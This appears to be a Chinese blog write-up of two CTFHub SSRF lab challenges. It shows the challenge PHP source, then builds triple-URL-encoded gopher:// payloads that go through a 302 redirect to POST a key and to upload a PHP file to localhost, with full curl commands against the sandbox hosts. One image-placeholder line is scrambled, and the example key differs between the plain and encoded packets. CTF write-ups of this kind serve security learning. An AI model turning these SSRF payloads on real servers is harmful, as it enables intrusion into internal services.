CTFHUB技能树-SSRF【持续更新】

 

0x00 POST请求

最近ctfhub新添加了一些题目,看到有ssrf的题目便去试了一下,前面几个都比较简单就暂时先不写,post 请求那个折腾了几天终于弄懂了,把过程记录下。
在这里插入图片描述

首先

我们看下题目描述,这个肯定是不能错过的。

*描述:发一个HTTP POST请求.ssrf是用php的curl实现的.并且会跟踪302跳转.

开始解题

我们打开题目,发现了flag.php 302.php index.php 三个文件。用直接访问flag.php提示我们需要从127.0.0.1访问。

于是使用http协议从127.0.0.1访问看看。
在这里插入图片描述
查看源代码。
在这里插入图片描述

查看302.php,发现了可以构造url用302跳转。
[外链图片转存失败,源站可能有防盗在这里插入!链机制,建描述]议将图片上https://传(imblog.cgimg.nn/2020091611KI5c205339.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzMzMjk1NDEw,size_16,color_FFFFFF,t_70#pic_center)alor_FFFFFF,t_70#pic_center)]
其实这里我们还可以通过file://协议去读每一个文件,但是需要知道绝对路径,ctfhub的web绝对路径一般是:

/var/www/html/

flag.php


<?php

error_reporting(0);

if($_SERVER["REMOTE_ADDR"] != "127.0.0.1"){
    echo "Just View From 127.0.0.1";
    return;
}

$flag=getenv("CTFHUB");
$key = md5($flag);

if(isset($_POST["key"]) && $_POST["key"] == $key){
    echo $flag;
    exit;
}
?>

<form action="/flag.php" method="post">
<input type="text" name="key">
<!-- Debug: key=<?php echo $key;?>-->
</form>

index.php

<?php

error_reporting(0);

header("Help: here is 302.php");

if (!isset($_REQUEST['url'])){
    header("Location: /?url=_");
    exit;
}

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_REQUEST['url']);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_exec($ch);
curl_close($ch);

302.php就不贴了,直接给了源代码的。

至此大概了解了本题的思路。需要我们用gopher协议通过302.php的跳转去用post key到flag.php,不过需要注意的是要从127.0.0.1发送数据。

构造gopher数据

我们首先要通过{host}:{port}/index.php?url=http://127.0.0.1/302.php去跳转gopher的协议。
gopher的数据应该是这样:

gopher://127.0.0.1:80/_POST /flag.php HTTP/1.1
Host: 127.0.0.1:80
Content-Length: 36	#特别注意此处的长度,长度不对也是不行的。
Content-Type: application/x-www-form-urlencoded

key=a96c4130c73185e519003c24968e7517  #key需要去通过127.0.0.1访问flag.php获取,也就是flag的MD5值。

以上数据包内容缺一不可

  •  特别注意Content-Length的长度,这个字段必须有,并且长度不对也是不行的。我不会告诉你我在这里被坑了一天_
  •  注意更改key
  •  gopher的数据需要用url编码三次之后再发送。
gopher://127.0.0.1:80/_POST%252520/flag.php%252520HTTP/1.1%25250d%25250aHost%25253A%252520127.0.0.1%253a80%25250d%25250aContent-Length%25253a%25252036%25250d%25250aContent-Type%25253a%252520application%25252fx-www-form-urlencoded%25250d%25250a%25250d%25250akey%253defba86faaeaff11dea094633e47cd06a
  • 1

构造获取flag数据

拼接url和gopher数据。

curl -vvv 'http://challenge-de43eaec0618623b.sandbox.ctfhub.com:10080/?url=http://127.0.0.1/302.php?url=gopher://127.0.0.1:80/_POST%252520/flag.php%252520HTTP/1.1%25250d%25250aHost%25253A%252520127.0.0.1%253a80%25250d%25250aContent-Length%25253a%25252036%25250d%25250aContent-Type%25253a%252520application%25252fx-www-form-urlencoded%25250d%25250a%25250d%25250akey%253defba86faaeaff11dea094633e47cd06a'
  • 1

稍等片刻,flag返回。
在这里插入图片描述

其实也可以用burp也一样。
在这里插入图片描述

0x01 上传文件

废话

这个题其实和post请求差不多,只要弄懂了post请求,这个基本没问题。

首先

我们看下题目,还是有302跳转和flag.php,这次的flag.php是文件上传,没有别的区别。
在这里插入图片描述
通过file:///协议我们读到flag.php的源代码:

<?php

error_reporting(0);

if($_SERVER["REMOTE_ADDR"] != "127.0.0.1"){
    echo "Just View From 127.0.0.1";
    return;
}

if(isset($_FILES["file"]) && $_FILES["file"]["size"] > 0){
    echo getenv("CTFHUB");
    exit;
}
?>

Upload Webshell

<form action="/flag.php" method="post" enctype="multipart/form-data">
    <input type="file" name="file">
</form>

也是让我们通过127.0.0.1访问flag.php上传一个文件上去就会返回flag。

构造请求

在构造请求之前我们随便构造一个文件上传的代码,如下:

<!DOCTYPE html>
<html>
<head>
<title>test XXE</title>
<meta charset="utf-8">
</head>
<body>
<form action="http://127.0.0.1/flag.php" method="POST" enctype="multipart/form-data">
    <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" />
    <input type="file" name="file" />
    <input type="submit" value="go" />
</form>
</body>

通过以上代码上传抓包。

POST /flag.php HTTP/1.1
Host: 127.0.0.1:80
Content-Length: 330
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.139.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytLtDfbm6HxuxgvVx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,am;q=0.7
Connection: close

------WebKitFormBoundarytLtDfbm6HxuxgvVx
Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"

123
------WebKitFormBoundarytLtDfbm6HxuxgvVx
Content-Disposition: form-data; name="file"; filename="123.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
------WebKitFormBoundarytLtDfbm6HxuxgvVx--

这个数据包也就是我们需要用302.php跳转来发送到flag.php的数据包。

构造gopher数据

那么我们需要构造gopher协议的数据包,上面说过了构造过程,这里我就不详细说了。
因为经过三次urlencode,所以代码有点长。

gopher://127.0.0.1:80/_POST%252520%25252Fflag.php%252520HTTP%25252F1.1%25250d%25250aHost%25253A%25253127.0.0.1%25250d%25250aContent-Length%25253A%252520333%25250d%25250a%252543%252561%252563%252568%252565%25252d%252543%25256f%25256e%252574%252572%25256f%25256c%25253a%252520%25256d%252561%252578%25252d%252561%252567%252565%25253d%252530%25250d%25250a%252555%252570%252567%252572%252561%252564%252565%25252d%252549%25256e%252573%252565%252563%252575%252572%252565%25252d%252552%252565%252571%252575%252565%252573%252574%252573%25253a%252520%252531%25250d%25250a%25254f%252572%252569%252567%252569%25256e%25253a%252520%252568%252574%252574%252570%25253a%25252f%25252f%252531%252539%252532%25252e%252531%252536%252538%25252e%252531%252533%252539%25252e%252531%25250d%25250a%252543%25256f%25256e%252574%252565%25256e%252574%25252d%252554%252579%252570%252565%25253a%252520%25256d%252575%25256c%252574%252569%252570%252561%252572%252574%25252f%252566%25256f%252572%25256d%25252d%252564%252561%252574%252561%25253b%252520%252562%25256f%252575%25256e%252564%252561%252572%252579%25253d%25252d%25252d%25252d%25252d%252557%252565%252562%25254b%252569%252574%252546%25256f%252572%25256d%252542%25256f%252575%25256e%252564%252561%252572%252579%252574%25254c%252574%252544%252566%252562%25256d%252536%252548%252578%252575%252578%252567%252576%252556%252578%25250d%25250a%252555%252573%252565%252572%25252d%252541%252567%252565%25256e%252574%25253a%252520%25254d%25256f%25257a%252569%25256c%25256c%252561%25252f%252535%25252e%252530%252520%252528%252557%252569%25256e%252564%25256f%252577%252573%252520%25254e%252554%252520%252531%252530%25252e%252530%25253b%252520%252557%252569%25256e%252536%252534%25253b%252520%252578%252536%252534%252529%252520%252541%252570%252570%25256c%252565%252557%252565%252562%25254b%252569%252574%25252f%252535%252533%252537%25252e%252533%252536%252520%252528%25254b%252548%252554%25254d%25254c%25252c%252520%25256c%252569%25256b%252565%252520%252547%252565%252563%25256b%25256f%252529%252520%252543%252568%252572%25256f%25256d%252565%25252f%252538%252535%25252e%252530%25252e%252534%252531%252538%252533%25252e%252531%252530%252532%252520%252553%252561%252566%252561%252572%252569%25252f%252535%252533%252537%25252e%252533%252536%25250d%25250a%252541%252563%252563%252565%252570%252574%25253a%252520%252574%252565%252578%252574%25252f%252568%252574%25256d%25256c%25252c%252561%252570%252570%25256c%252569%252563%252561%252574%252569%25256f%25256e%25252f%252578%252568%252574%25256d%25256c%25252b%252578%25256d%25256c%25252c%252561%252570%252570%25256c%252569%252563%252561%252574%252569%25256f%25256e%25252f%252578%25256d%25256c%25253b%252571%25253d%252530%25252e%252539%25252c%252569%25256d%252561%252567%252565%25252f%252561%252576%252569%252566%25252c%252569%25256d%252561%252567%252565%25252f%252577%252565%252562%252570%25252c%252569%25256d%252561%252567%252565%25252f%252561%252570%25256e%252567%25252c%25252a%25252f%25252a%25253b%252571%25253d%252530%25252e%252538%25252c%252561%252570%252570%25256c%252569%252563%252561%252574%252569%25256f%25256e%25252f%252573%252569%252567%25256e%252565%252564%25252d%252565%252578%252563%252568%252561%25256e%252567%252565%25253b%252576%25253d%252562%252533%25253b%252571%25253d%252530%25252e%252539%25250d%25250a%252552%252565%252566%252565%252572%252565%252572%25253a%252520%252568%252574%252574%252570%25253a%25252f%25252f%252531%252539%252532%25252e%252531%252536%252538%25252e%252531%252533%252539%25252e%252531%25252f%252575%252570%25256c%25256f%252561%252564%25255f%252573%252565%252572%25252e%252570%252568%252570%25250d%25250a%252541%252563%252563%252565%252570%252574%25252d%252545%25256e%252563%25256f%252564%252569%25256e%252567%25253a%252520%252567%25257a%252569%252570%25252c%252520%252564%252565%252566%25256c%252561%252574%252565%25250d%25250a%252541%252563%252563%252565%252570%252574%25252d%25254c%252561%25256e%252567%252575%252561%252567%252565%25253a%252520%25257a%252568%25252d%252543%25254e%25252c%25257a%252568%25253b%252571%25253d%252530%25252e%252539%25252c%252565%25256e%25253b%252571%25253d%252530%25252e%252538%25252c%252561%25256d%25253b%252571%25253d%252530%25252e%252537%25250d%25250a%252543%25256f%25256e%25256e%252565%252563%252574%252569%25256f%25256e%25253a%252520%252563%25256c%25256f%252573%252565%25250d%25250a%25250d%25250a%25252d%25252d%25252d%25252d%25252d%25252d%252557%252565%252562%25254b%252569%252574%252546%25256f%252572%25256d%252542%25256f%252575%25256e%252564%252561%252572%252579%252574%25254c%252574%252544%252566%252562%25256d%252536%252548%252578%252575%252578%252567%252576%252556%252578%25250d%25250a%252543%25256f%25256e%252574%252565%25256e%252574%25252d%252544%252569%252573%252570%25256f%252573%252569%252574%252569%25256f%25256e%25253a%252520%252566%25256f%252572%25256d%25252d%252564%252561%252574%252561%25253b%252520%25256e%252561%25256d%252565%25253d%252522%252550%252548%252550%25255f%252553%252545%252553%252553%252549%25254f%25254e%25255f%252555%252550%25254c%25254f%252541%252544%25255f%252550%252552%25254f%252547%252552%252545%252553%252553%252522%25250d%25250a%25250d%25250a%252531%252532%252533%25250d%25250a%25252d%25252d%25252d%25252d%25252d%25252d%252557%252565%252562%25254b%252569%252574%252546%25256f%252572%25256d%252542%25256f%252575%25256e%252564%252561%252572%252579%252574%25254c%252574%252544%252566%252562%25256d%252536%252548%252578%252575%252578%252567%252576%252556%252578%25250d%25250a%252543%25256f%25256e%252574%252565%25256e%252574%25252d%252544%252569%252573%252570%25256f%252573%252569%252574%252569%25256f%25256e%25253a%252520%252566%25256f%252572%25256d%25252d%252564%252561%252574%252561%25253b%252520%25256e%252561%25256d%252565%25253d%252522%252566%252569%25256c%252565%252522%25253b%252520%252566%252569%25256c%252565%25256e%252561%25256d%252565%25253d%252522%252531%252532%252533%25252e%252570%252568%252570%252522%25250d%25250a%252543%25256f%25256e%252574%252565%25256e%252574%25252d%252554%252579%252570%252565%25253a%252520%252561%252570%252570%25256c%252569%252563%252561%252574%252569%25256f%25256e%25252f%25256f%252563%252574%252565%252574%25252d%252573%252574%252572%252565%252561%25256d%25250d%25250a%25250d%25250a%25253c%25253f%252570%252568%252570%252520%252570%252568%252570%252569%25256e%252566%25256f%252528%252529%25253b%25253f%25253e%25250d%25250a%25252d%25252d%25252d%25252d%25252d%25252d%252557%252565%252562%25254b%252569%252574%252546%25256f%252572%25256d%252542%25256f%252575%25256e%252564%252561%252572%252579%252574%25254c%252574%252544%252566%252562%25256d%252536%252548%252578%252575%252578%252567%252576%252556%252578%25252d%25252d%25250d%25250a
  • 1

构造获取flag数据

把url拼接上gopher数据就可以获取flag。

curl -v 'http://challenge-eb67451770224163.sandbox.ctfhub.com:10080/?url=http://127.0.0.1/302.php?url=gopher://127.0.0.1:80/_POST%252520%25252Fflag.php%252520HTTP%25252F1.1%25250d%25250aHost%25253A%25253127.0.0.1%25250d%25250aContent-Length%25253A%252520333%25250d%25250a%252543%252561%252563%252568%252565%25252d%252543%25256f%25256e%252574%252572%25256f%25256c%25253a%252520%25256d%252561%252578%25252d%252561%252567%252565%25253d%252530%25250d%25250a%252555%252570%252567%252572%252561%252564%252565%25252d%252549%25256e%252573%252565%252563%252575%252572%252565%25252d%252552%252565%252571%252575%252565%252573%252574%252573%25253a%252520%252531%25250d%25250a%25254f%252572%252569%252567%252569%25256e%25253a%252520%252568%252574%252574%252570%25253a%25252f%25252f%252531%252539%252532%25252e%252531%252536%252538%25252e%252531%252533%252539%25252e%252531%25250d%25250a%252543%25256f%25256e%252574%252565%25256e%252574%25252d%252554%252579%252570%252565%25253a%252520%25256d%252575%25256c%252574%252569%252570%252561%252572%252574%25252f%252566%25256f%252572%25256d%25252d%252564%252561%252574%252561%25253b%252520%252562%25256f%252575%25256e%252564%252561%252572%252579%25253d%25252d%25252d%25252d%25252d%252557%252565%252562%25254b%252569%252574%252546%25256f%252572%25256d%252542%25256f%252575%25256e%252564%252561%252572%252579%252574%25254c%252574%252544%252566%252562%25256d%252536%252548%252578%252575%252578%252567%252576%252556%252578%25250d%25250a%252555%252573%252565%252572%25252d%252541%252567%252565%25256e%252574%25253a%252520%25254d%25256f%25257a%252569%25256c%25256c%252561%25252f%252535%25252e%252530%252520%252528%252557%252569%25256e%252564%25256f%252577%252573%252520%25254e%252554%252520%252531%252530%25252e%252530%25253b%252520%252557%252569%25256e%252536%252534%25253b%252520%252578%252536%252534%252529%252520%252541%252570%252570%25256c%252565%252557%252565%252562%25254b%252569%252574%25252f%252535%252533%252537%25252e%252533%252536%252520%252528%25254b%252548%252554%25254d%25254c%25252c%252520%25256c%252569%25256b%252565%252520%252547%252565%252563%25256b%25256f%252529%252520%252543%252568%252572%25256f%25256d%252565%25252f%252538%252535%25252e%252530%25252e%252534%252531%252538%252533%25252e%252531%252530%252532%252520%252553%252561%252566%252561%252572%252569%25252f%252535%252533%252537%25252e%252533%252536%25250d%25250a%252541%252563%252563%252565%252570%252574%25253a%252520%252574%252565%252578%252574%25252f%252568%252574%25256d%25256c%25252c%252561%252570%252570%25256c%252569%252563%252561%252574%252569%25256f%25256e%25252f%252578%252568%252574%25256d%25256c%25252b%252578%25256d%25256c%25252c%252561%252570%252570%25256c%252569%252563%252561%252574%252569%25256f%25256e%25252f%252578%25256d%25256c%25253b%252571%25253d%252530%25252e%252539%25252c%252569%25256d%252561%252567%252565%25252f%252561%252576%252569%252566%25252c%252569%25256d%252561%252567%252565%25252f%252577%252565%252562%252570%25252c%252569%25256d%252561%252567%252565%25252f%252561%252570%25256e%252567%25252c%25252a%25252f%25252a%25253b%252571%25253d%252530%25252e%252538%25252c%252561%252570%252570%25256c%252569%252563%252561%252574%252569%25256f%25256e%25252f%252573%252569%252567%25256e%252565%252564%25252d%252565%252578%252563%252568%252561%25256e%252567%252565%25253b%252576%25253d%252562%252533%25253b%252571%25253d%252530%25252e%252539%25250d%25250a%252552%252565%252566%252565%252572%252565%252572%25253a%252520%252568%252574%252574%252570%25253a%25252f%25252f%252531%252539%252532%25252e%252531%252536%252538%25252e%252531%252533%252539%25252e%252531%25252f%252575%252570%25256c%25256f%252561%252564%25255f%252573%252565%252572%25252e%252570%252568%252570%25250d%25250a%252541%252563%252563%252565%252570%252574%25252d%252545%25256e%252563%25256f%252564%252569%25256e%252567%25253a%252520%252567%25257a%252569%252570%25252c%252520%252564%252565%252566%25256c%252561%252574%252565%25250d%25250a%252541%252563%252563%252565%252570%252574%25252d%25254c%252561%25256e%252567%252575%252561%252567%252565%25253a%252520%25257a%252568%25252d%252543%25254e%25252c%25257a%252568%25253b%252571%25253d%252530%25252e%252539%25252c%252565%25256e%25253b%252571%25253d%252530%25252e%252538%25252c%252561%25256d%25253b%252571%25253d%252530%25252e%252537%25250d%25250a%252543%25256f%25256e%25256e%252565%252563%252574%252569%25256f%25256e%25253a%252520%252563%25256c%25256f%252573%252565%25250d%25250a%25250d%25250a%25252d%25252d%25252d%25252d%25252d%25252d%252557%252565%252562%25254b%252569%252574%252546%25256f%252572%25256d%252542%25256f%252575%25256e%252564%252561%252572%252579%252574%25254c%252574%252544%252566%252562%25256d%252536%252548%252578%252575%252578%252567%252576%252556%252578%25250d%25250a%252543%25256f%25256e%252574%252565%25256e%252574%25252d%252544%252569%252573%252570%25256f%252573%252569%252574%252569%25256f%25256e%25253a%252520%252566%25256f%252572%25256d%25252d%252564%252561%252574%252561%25253b%252520%25256e%252561%25256d%252565%25253d%252522%252550%252548%252550%25255f%252553%252545%252553%252553%252549%25254f%25254e%25255f%252555%252550%25254c%25254f%252541%252544%25255f%252550%252552%25254f%252547%252552%252545%252553%252553%252522%25250d%25250a%25250d%25250a%252531%252532%252533%25250d%25250a%25252d%25252d%25252d%25252d%25252d%25252d%252557%252565%252562%25254b%252569%252574%252546%25256f%252572%25256d%252542%25256f%252575%25256e%252564%252561%252572%252579%252574%25254c%252574%252544%252566%252562%25256d%252536%252548%252578%252575%252578%252567%252576%252556%252578%25250d%25250a%252543%25256f%25256e%252574%252565%25256e%252574%25252d%252544%252569%252573%252570%25256f%252573%252569%252574%252569%25256f%25256e%25253a%252520%252566%25256f%252572%25256d%25252d%252564%252561%252574%252561%25253b%252520%25256e%252561%25256d%252565%25253d%252522%252566%252569%25256c%252565%252522%25253b%252520%252566%252569%25256c%252565%25256e%252561%25256d%252565%25253d%252522%252531%252532%252533%25252e%252570%252568%252570%252522%25250d%25250a%252543%25256f%25256e%252574%252565%25256e%252574%25252d%252554%252579%252570%252565%25253a%252520%252561%252570%252570%25256c%252569%252563%252561%252574%252569%25256f%25256e%25252f%25256f%252563%252574%252565%252574%25252d%252573%252574%252572%252565%252561%25256d%25250d%25250a%25250d%25250a%25253c%25253f%252570%252568%252570%252520%252570%252568%252570%252569%25256e%252566%25256f%252528%252529%25253b%25253f%25253e%25250d%25250a%25252d%25252d%25252d%25252d%25252d%25252d%252557%252565%252562%25254b%252569%252574%252546%25256f%252572%25256d%252542%25256f%252575%25256e%252564%252561%252572%252579%252574%25254c%252574%252544%252566%252562%25256d%252536%252548%252578%252575%252578%252567%252576%252556%252578%25252d%25252d%25250d%25250a'
  • 1

发送数据之后稍微等几秒。
在这里插入图片描述

burp也一样
在这里插入图片描述
谢谢查看,后面有空我也会持续更新!
【持续更新】
ssrf协议参考:Legend__LinSSRF基础:Gopher协议发送Get和Post请求

MD5解密网站:md5解密 md5 decrypt

 

posted @ 2020-12-04 10:41  Aiue  阅读(807)  评论(3编辑  收藏  举报